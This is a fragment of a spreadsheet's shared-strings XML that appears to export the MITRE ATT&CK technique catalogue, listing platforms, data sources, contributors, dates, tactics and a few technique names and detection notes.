    <t>Linux, macOS, Windows, Containers</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Metadata, Service: Service Creation, Service: Service Metadata, Process: Process Creation, Image: Image Metadata, Scheduled Job: Scheduled Job Metadata, File: File Metadata, Scheduled Job: Scheduled Job Modification, Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix, Nick Carr, Mandiant, David Lu, Tripwire, Felipe Espósito, @Pr0teus, Elastic, Bartosz Jerzman, Goldstein Menachem</t>
  </si>
  <si>
    <t>Application Control</t>
  </si>
  <si>
    <t>macOS, Windows</t>
  </si>
  <si>
    <t>14 September 2023</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Metadata, Command: Command Execution, File: File Metadata</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Modification, Service: Service Creation, Command: Command Execution, Service: Service Metadata, Scheduled Job: Scheduled Job Metadata</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Yossi Weizman, Azure Defender Research Team, Vishwas Manral, McAfee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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/008</t>
  </si>
  <si>
    <t>08 March 2023</t>
  </si>
  <si>
    <t>14 June 2023</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch, Ben Smith, @ezaspy</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>27 September 2023</t>
  </si>
  <si>
    <t>03 October 2023</t>
  </si>
  <si>
    <t>persistence, privilege-escalation</t>
  </si>
  <si>
    <t>File: File Modification, Windows Registry: Windows Registry Key Creation, Command: Command Execution, File: File Creation, Process: Process Creation, Active Directory: Active Directory Object Modification</t>
  </si>
  <si>
    <t>Login Hook</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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Active Directory: Active Directory Object Modification, File: File Modification, Process: Process Creation, File: File Creation</t>
  </si>
  <si>
    <t>RC Scripts</t>
  </si>
  <si>
    <t>macOS, Linux</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation, File: File Modification, Command: Command Execution</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Process: Process Creation, File: File Modification</t>
  </si>
  <si>
    <t>Network Share: Network Share Access, Command: Command Execution, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, File: File Access</t>
  </si>
  <si>
    <t>David Tayouri</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</si>
  <si>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</si>
  <si>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10 July 2023</t>
  </si>
  <si>
    <t>credential-access, discovery</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Network, IaaS</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix, Tiago Faria, 3CORESec, Austin Clark, @c2defense, Itamar Mizrahi, Cymptom</t>
  </si>
  <si>
    <t>Network Service Discovery</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</si>
  <si>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</si>
  <si>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Windows, IaaS, Linux, macOS, Containers, Network</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Command: Command Execution, Cloud Service: Cloud Service Enumeration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</si>
  <si>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</si>
  <si>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execution</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>@ionstorm, Olaf Hartong, Falcon Force</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Office 365, SaaS, IaaS, Google Workspace, Network</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access, Network Traffic: Network Traffic Flow, Command: Command Execution, Network Traffic: Network Traffic Content, Application Log: Application Log Content, File: File Access, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>William Cain, Alfredo Abarca</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, File: File Access, Network Traffic: Network Traffic Content, Command: Command Execution, Network Traffic: Network Connection Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, IaaS, Linux, macOS, Network</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Praetorian, Austin Clark, @c2defense</t>
  </si>
  <si>
    <t>File: File Access, Drive: Drive Creation, Process: Process Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Process: Process Creation, Drive: Drive Creation, File: File Access, Command: Command Execution</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</si>
  <si>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</si>
  <si>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execution, persistence, privilege-escalation</t>
  </si>
  <si>
    <t>Windows, Linux, macOS, Containers</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Creation, File: File Creation, Process: Process Creation, Container: Container Creation, Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>Prashant Verma, Paladion, Leo Loobeek, @leoloobeek, Travis Smith, Tripwire, Alain Homewood, Insomnia Security, Andrew Northern, @ex_raritas, Bryan Campbell, @bry_campbell, Zachary Abzug, @ZackDoesML, Selena Larson, @selenalarson</t>
  </si>
  <si>
    <t>SYSTEM, Administrator, User</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Scheduled Job: Scheduled Job Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, File: File Modification</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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation, Command: Command Execution</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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Creation, File: File Modification, File: File Creation, Process: Process Creation, Command: Command Execution, Network Traffic: Network Traffic Flow, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Andrew Northern, @ex_raritas, Bryan Campbell, @bry_campbell, Zachary Abzug, @ZackDoesML, Selena Larson, @selenalarson, Sittikorn Sangrattanapitak</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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, Command: Command Execution, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>File: File Creation, Container: Container Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID), Vishwas Manral, McAfee, Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>defense-evasion, privilege-escalation</t>
  </si>
  <si>
    <t>Process: Process Access, Process: Process Modification, File: File Modification, Process: Process Metadata, File: File Metadata, Process: OS API Execution, Module: Module Load</t>
  </si>
  <si>
    <t>Anastasios Pingios, Christiaan Beek, @ChristiaanBeek, Ryan Becwar</t>
  </si>
  <si>
    <t>Application control, Anti-virus</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</si>
  <si>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</si>
  <si>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Process: Process Metadata, Process: Process Access, Process: Process Modification, Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>Boominathan Sundaram</t>
  </si>
  <si>
    <t>Process: Process Access, Process: OS API Execution, Process: Process Modification</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Modification, Process: Process Access</t>
  </si>
  <si>
    <t>Process: Process Modification, Process: Process Access, Process: OS API Execution</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Process: Process Modification, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Process Doppelgänging</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Module: Module Load</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1055/015</t>
  </si>
  <si>
    <t>22 November 2021</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</si>
  <si>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</si>
  <si>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Process: Process Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>collection, credential-access</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification, Process: Process Metadata, Process: OS API Execution, Driver: Driver Load</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, root, User</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</si>
  <si>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</si>
  <si>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Windows, macOS, Linux, Network</t>
  </si>
  <si>
    <t>TruKno</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</si>
  <si>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</si>
  <si>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Script: Script Execution, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Process: Process Metadata, Process: OS API Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Process: OS API Execution, Command: Command Execution</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Network, Office 365, Azure AD, IaaS, Google Workspace</t>
  </si>
  <si>
    <t>Script: Script Execution, Process: Process Creation, Process: Process Metadata, Module: Module Load, Command: Command Execution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</si>
  <si>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</si>
  <si>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</si>
  <si>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Script: Script Execution, Process: Process Creation, Process: Process Metadata, Command: Command Execution, Module: Module Load</t>
  </si>
  <si>
    <t>Mayuresh Dani, Qualys, Praetorian, Ross Brittain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</si>
  <si>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</si>
  <si>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</si>
  <si>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Module: Module Load, Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution, Command: Command Execution</t>
  </si>
  <si>
    <t>User, Administrator, SYSTEM</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/009</t>
  </si>
  <si>
    <t>17 March 2022</t>
  </si>
  <si>
    <t>IaaS, Azure AD, Office 365, SaaS, Google Workspace</t>
  </si>
  <si>
    <t>Ozan Olali, Nichols Jasper, Jason Sevilla, Marcus Weeks, Caio Silva</t>
  </si>
  <si>
    <t>privilege-escalation</t>
  </si>
  <si>
    <t>Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics, Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security, Idan Revivo, @idanr86, Team Nautilus Aqua Security, David Tayouri</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</si>
  <si>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</si>
  <si>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2.5</t>
  </si>
  <si>
    <t>Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace, Containers</t>
  </si>
  <si>
    <t>Process: Process Creation, Group: Group Metadata, Command: Command Execution, Application Log: Application Log Content, Group: Group Enumeration</t>
  </si>
  <si>
    <t>Daniel Prizmant, Palo Alto Networks, Yuval Avrahami, Palo Alto Networks, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Group: Group Enumeration, Command: Command Execution</t>
  </si>
  <si>
    <t>Harshal Tupsamudre, Qualys, Miriam Wiesner, @miriamxyra, Microsoft Security</t>
  </si>
  <si>
    <t>Group: Group Enumeration, Command: Command Execution, Process: OS API Execution, Process: Process Creation</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</si>
  <si>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</si>
  <si>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Azure AD, Office 365, SaaS, IaaS, Google Workspace</t>
  </si>
  <si>
    <t>Command: Command Execution, Application Log: Application Log Content, Process: Process Creation, Group: Group Metadata, Group: Group Enumeration</t>
  </si>
  <si>
    <t>Regina Elwell, Isif Ibrahima, Mandiant</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Containers, Network, Office 365, Google Workspace</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Modification, File: File Modification, Firewall: Firewall Rule Modification, User Account: User Account Authentication, File: File Metadata, User Account: User Account Deletion, Process: OS API Execution, Application Log: Application Log Content, Command: Command Execution, File: File Deletion, Process: Process Creation, Windows Registry: Windows Registry Key Modification, Network Traffic: Network Traffic Content, Windows Registry: Windows Registry Key Deletion</t>
  </si>
  <si>
    <t>Brad Geesaman, @bradgeesaman, Ed Williams, Trustwave, SpiderLabs, Blake Strom, Microsoft 365 Defender</t>
  </si>
  <si>
    <t>Log analysis, Host intrusion prevention systems, Anti-virus</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Deletion, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Lucas Heiligenstein</t>
  </si>
  <si>
    <t>File: File Deletion, File: File Modification, Command: Command Execution</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</si>
  <si>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</si>
  <si>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File: File Deletion, File: File Modification, Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Vikas Singh, Sophos, Emile Kenning, Sophos, Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content, Command: Command Execution, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>File: File Modification, File: File Metadata</t>
  </si>
  <si>
    <t>root, SYSTEM, User</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>15 June 2022</t>
  </si>
  <si>
    <t>Process: Process Creation, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Firewall: Firewall Rule Modification, File: File Modification</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>08 July 2022</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Office 365, Google Workspace</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Deletion, File: File Modification, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Liran Ravich, CardinalOps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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/009</t>
  </si>
  <si>
    <t>29 July 2022</t>
  </si>
  <si>
    <t>File: File Deletion, User Account: User Account Deletion, File: File Modification, Windows Registry: Windows Registry Key Modification, Process: Process Creation, Windows Registry: Windows Registry Key Deletion, Scheduled Job: Scheduled Job Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Gavin Knapp</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Duane Michael</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Jan Petrov, Citi, Chris Heald</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</si>
  <si>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Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: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</si>
  <si>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execution, lateral-movement</t>
  </si>
  <si>
    <t>Process: Process Creation, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Shane Tully, @securitygypsy, Joe Gumke, U.S. Bank</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</si>
  <si>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</si>
  <si>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Windows, IaaS, Linux, macOS</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, Windows Registry: Windows Registry Key Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Praetorian, Shane Tully, @securitygypsy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Windows Registry: Windows Registry Key Modification, File: File Access, Command: Command Execution</t>
  </si>
  <si>
    <t>Massimiliano Romano, BT Security</t>
  </si>
  <si>
    <t>File: File Creation, Command: Command Execution, File: File Access</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</si>
  <si>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</si>
  <si>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2.6</t>
  </si>
  <si>
    <t>defense-evasion, persistence, privilege-escalation, initial-access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</si>
  <si>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</si>
  <si>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Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace, Containers, Network</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Syed Ummar Farooqh, McAfee, Prasad Somasamudram, McAfee, Sekhar Sarukkai, McAfee, Jon Sternstein, Stern Security, Yossi Weizman, Azure Defender Research Team, Netskope, Mark Wee, Praetorian, Goldstein Menachem</t>
  </si>
  <si>
    <t>User, Administrator</t>
  </si>
  <si>
    <t>Firewall, Anti-virus, Host Intrusion Prevention Systems, Network Intrusion Detection System, Application Control, System Access Controls</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</si>
  <si>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</si>
  <si>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User Account: User Account Authentication, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Containers, Network</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</si>
  <si>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or be hybrid joined between on-premises systems and the cloud through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accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.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</si>
  <si>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16 October 2023</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Logon Session: Logon Session Metadata, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>31 May 2023</t>
  </si>
  <si>
    <t>Windows, Office 365, SaaS, Linux, macOS</t>
  </si>
  <si>
    <t>Network Share: Network Share Access, Process: Process Creation, File: File Modification, File: File Creation</t>
  </si>
  <si>
    <t>Michal Dida, ESET, David Routin</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Maril Vernon @shewhohacks, Praetorian, Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic, Microsoft Threat Intelligence Center (MSTIC), Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Process: OS API Execution, Group: Group Enumeration, Process: Process Creation, Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic, Miriam Wiesner, @miriamxyra, Microsoft Security</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Command: Command Execution, Process: OS API Execution, Network Traffic: Network Traffic Content, Group: Group Enumeration</t>
  </si>
  <si>
    <t>ExtraHop, Miriam Wiesner, @miriamxyra, Microsoft Security</t>
  </si>
  <si>
    <t>Windows, Office 365, Google Workspace</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Jon Sheedy, Heather Linn, Walker Johnson</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</si>
  <si>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</si>
  <si>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lateral-movement, initial-access</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Creation, Drive: Drive Creation, File: File Creation</t>
  </si>
  <si>
    <t>Joas Antonio dos Santos, @C0d3Cr4zy</t>
  </si>
  <si>
    <t>Drive: Drive Creation, Drive: Drive Access</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</si>
  <si>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</si>
  <si>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Windows, Linux, macOS, Network</t>
  </si>
  <si>
    <t>Ryan Becwar, Duane Michael</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies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</si>
  <si>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</si>
  <si>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Windows, Azure AD, Office 365, IaaS, Linux, macOS, Google Workspace, SaaS, Network, Containers</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Active Directory: Active Directory Object Modification, File: File Modification, Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC), Praetorian, Tim MalcomVetter, Wojciech Lesicki, Arad Inbar, Fidelis Security</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</si>
  <si>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</si>
  <si>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IaaS, Azure AD, SaaS</t>
  </si>
  <si>
    <t>Expel, Oleg Kolesnikov, Securonix, Jannie Li, Microsoft Threat Intelligence Center (MSTIC), Zur Ulianitzky, XM Cyber, Alex Soler, AttackIQ, Dylan Silva, AWS Security, Arad Inbar, Fidelis Security</t>
  </si>
  <si>
    <t>Additional Email Delegate Permissions</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</si>
  <si>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</si>
  <si>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Group: Group Modification, Application Log: Application Log Content, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Microsoft Detection and Response Team (DART), Mike Burns, Mandiant, Naveen Vijayaraghavan, Nilesh Dherange (Gurucul), Jannie Li, Microsoft Threat Intelligence Center (MSTIC), Arad Inbar, Fidelis Security</t>
  </si>
  <si>
    <t>Additional Cloud Roles</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Office 365, IaaS, SaaS, Google Workspace, Azure AD</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC), Alex Parsons, Crowdstrike, Chris Romano, Crowdstrike, Wojciech Lesicki, Pià Consigny, Tenable, Clément Notin, Tenable, Praetorian, Alex Soler, AttackIQ, Arad Inbar, Fidelis Security</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, macOS, IaaS, Network</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, File: File Modification</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary, Dror Alon, Palo Alto Networks, Or Kliger, Palo Alto Networks, Austin Clark, @c2defense, Arad Inbar, Fidelis Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/005</t>
  </si>
  <si>
    <t>04 March 2022</t>
  </si>
  <si>
    <t>Azure AD, Windows, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Active Directory: Active Directory Object Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Pawel Partyka, Microsoft 365 Defender, Mike Moran, Joe Gumke, U.S. Bank, Arad Inbar, Fidelis Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/006</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content</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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Command: Command Execution, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>John Page (aka hyp3rlinx), ApparitionSec, Mark Wee, Shailesh Tiwary (Indian Army), The DFIR Report, Alain Homewood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</si>
  <si>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</si>
  <si>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13 October 2023</t>
  </si>
  <si>
    <t>Gordon Long, Box, Inc., @ethicalhax, Stefan Kanthak, Tristan Madani (Cybereason)</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Command: Command Execution, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>David Fiser, @anu4is, Trend Micro, Alfredo Oliveira, Trend Micro, Magno Logan, @magnologan, Trend Micro, Yossi Weizman, Azure Defender Research Team, Ed Williams, Trustwave, SpiderLabs, Mohamed Kmal</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</si>
  <si>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</si>
  <si>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User Account: User Account Authentication, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC), Mohamed Kmal</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Office 365, Azure AD, Network</t>
  </si>
  <si>
    <t>Mohamed Kmal</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC), John Strand</t>
  </si>
  <si>
    <t>Diogo Fernandes, Anastasios Pingios</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception</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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Modification, Process: OS API Execution, Network Traffic: Network Traffic Flow, Command: Command Execution, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Bartosz Jerzman, Travis Smith, Tripwire, David Lu, Tripwire</t>
  </si>
  <si>
    <t>Windows, Office 365, Google Workspace, macOS, Linux</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Application Log: Application Log Content, Network Traffic: Network Connection Creation, File: File Access, Command: Command Execution</t>
  </si>
  <si>
    <t>Office 365, Windows, Google Workspace</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Command: Command Execution, Network Traffic: Network Connection Creation</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</si>
  <si>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</si>
  <si>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Office 365, Windows, Google Workspace, macOS, Linux</t>
  </si>
  <si>
    <t>Command: Command Execution, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Microsoft Security, Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC), Liran Ravich, CardinalOps</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, IaaS, SaaS</t>
  </si>
  <si>
    <t>Permissions to access directories, files, and API endpoints that store information of interest.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows, Network</t>
  </si>
  <si>
    <t>Process: OS API Execution, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>FIRST.ORG's Cyber Threat Intelligence SIG, Austin Clark, @c2defense</t>
  </si>
  <si>
    <t>Casey Smith, Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>@ionstorm, Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t>.NET Framework version 4 or higher</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</si>
  <si>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</si>
  <si>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12 October 2023</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</si>
  <si>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</si>
  <si>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21 April 2023</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</si>
  <si>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</si>
  <si>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03 March 2023</t>
  </si>
  <si>
    <t>persistence, initial-access</t>
  </si>
  <si>
    <t>Windows, Linux, Containers, macOS</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Logon Session: Logon Session Metadata, Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>ExtraHop, David Fiser, @anu4is, Trend Micro, Alfredo Oliveira, Trend Micro, Idan Frimark, Cisco, Rory McCune, Aqua Security, Yuval Avrahami, Palo Alto Networks, Jay Chen, Palo Alto Networks, Brad Geesaman, @bradgeesaman, Magno Logan, @magnologan, Trend Micro, Ariel Shuper, Cisco, Yossi Weizman, Azure Defender Research Team, Vishwas Manral, McAfee, Daniel Oakley, Travis Smith, Tripwire, David Tayouri</t>
  </si>
  <si>
    <t>Process: OS API Execution, Command: Command Execution, User Account: User Account Metadata, Process: Process Metadata, Process: Process Creation, Active Directory: Active Directory Object Modification</t>
  </si>
  <si>
    <t>Tom Ueltschi @c_APT_ure, Travis Smith, Tripwire, Robby Winchester, @robwinchester3, Jared Atkinson, @jaredcatkinson</t>
  </si>
  <si>
    <t>Windows User Account Control, Heuristic Detection, System Access Controls, Host Forensic Analysis</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</si>
  <si>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</si>
  <si>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Jonny Johnson</t>
  </si>
  <si>
    <t>Windows User Account Control, System access controls, File system access controls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</si>
  <si>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</si>
  <si>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Vadim Khrykov, Jonny Johnson</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>Heuristic Detection, Host Forensic Analysis</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security, Vincent Le Toux</t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>Windows, Azure AD, Office 365, IaaS, Linux, macOS, Google Workspace, Network, Containers, SaaS</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, User Account: User Account Creation</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC), Praetorian, Austin Clark, @c2defense</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, Network, Containers</t>
  </si>
  <si>
    <t>User Account: User Account Creation, Process: Process Creation, Command: Command Execution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</si>
  <si>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</si>
  <si>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Azure AD, Office 365, IaaS, Google Workspace, SaaS</t>
  </si>
  <si>
    <t>Praetorian, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Windows, Office 365</t>
  </si>
  <si>
    <t>File: File Creation, Application Log: Application Log Content, Windows Registry: Windows Registry Key Modification, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Nick Carr, Mandiant, Microsoft Threat Intelligence Center (MSTIC), Sahar Shukrun, Praetorian, Loic Jaquemet, Ricardo Dias</t>
  </si>
  <si>
    <t>File: File Creation, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, File: File Modification</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation, Command: Command Execution, File: File Modification, Windows Registry: Windows Registry Key Modification, File: File Creation, Process: Process Creation, Module: Module Load</t>
  </si>
  <si>
    <t>Process: Process Creation, Application Log: Application Log Content, Command: Command Execution</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, File: File Modification, Command: Command Execution, Windows Registry: Windows Registry Key Creation, Process: Process Creation, File: File Creation</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Script: Script Execution, File: File Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward, Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host Intrusion Prevention Systems, Signature-based Detection, Network Intrusion Detection System</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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Creation, Process: Process Creation, Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Chris Ross @xorrior, Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>Process: Process Modification, Process: Process Access, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>File: File Access, Network Traffic: Network Traffic Flow, File: File Modification, File: File Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Teodor Cimpoesu, Sudhanshu Chauhan, @Sudhanshu_C</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</si>
  <si>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</si>
  <si>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initial-access</t>
  </si>
  <si>
    <t>Windows, Linux, macOS, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Process: Process Creation, File: File Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services), Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</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</si>
  <si>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</si>
  <si>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Windows, IaaS, Network, Linux, macOS, Containers</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Yossi Weizman, Azure Defender Research Team, Praetorian</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</si>
  <si>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</si>
  <si>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Sensor Health: Host Status, File: File Metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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defense-evasion, persistence</t>
  </si>
  <si>
